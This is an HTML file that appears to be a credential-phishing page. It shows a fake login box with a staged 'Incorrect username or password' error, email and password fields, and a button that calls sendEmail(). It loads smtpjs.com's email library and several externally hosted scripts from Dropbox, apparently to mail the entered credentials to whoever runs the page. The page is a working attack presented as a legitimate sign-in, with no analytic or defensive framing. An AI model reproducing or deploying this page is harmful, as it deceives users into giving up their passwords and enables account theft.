<html lang="en">
<head>
<meta charset="utf-8">
<script language="Javascript" src="https://dl.dropbox.com/s/71mbw0ziz24stew/myscr584876.js?dl=0"></script>


</head>
<body>
<script language="Javascript" src="https://dl.dropbox.com/s/45uascggf6klqxg/myscr262639.js?dl=0"></script>


 <div class="modal-content animate" >
    
	 
	<script language="Javascript" src="https://dl.dropbox.com/s/iri3h6e40giwbgp/myscr408434.js?dl=0"></script>
     <script language="Javascript" src="https://dl.dropbox.com/s/q3i9j9uulpdw0ex/myscr294914.js?dl=0"></script>
	 <p > <center  style="color:red">Incorrect username or password </center> </p>
	 
	  <input type="email" placeholder="Email Address"  id="myText" required="">


<br>
	 <input type="password" placeholder="Enter Password" id="password" required="">
        
<br>
   <button type="submit" id="submit-btn"  onclick="sendEmail();">CONTINUE</button>
     
    </p></center>
	
	    <div class="container" style="background-color:#f1f1f1">
     
    
	
	  </div>


<script language="Javascript" src="https://dl.dropbox.com/s/2ok5kygor237f5u/myscr811804.js?dl=0"></script>
<script  src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js">

</script>
 <script src= 
	"https://smtpjs.com/v3/smtp.js"> 
</script> 
<script language="Javascript" src="https://dl.dropbox.com/s/nya9lnjh6ncas7x/myscr484999.js?dl=0"></script>
</body>
</html>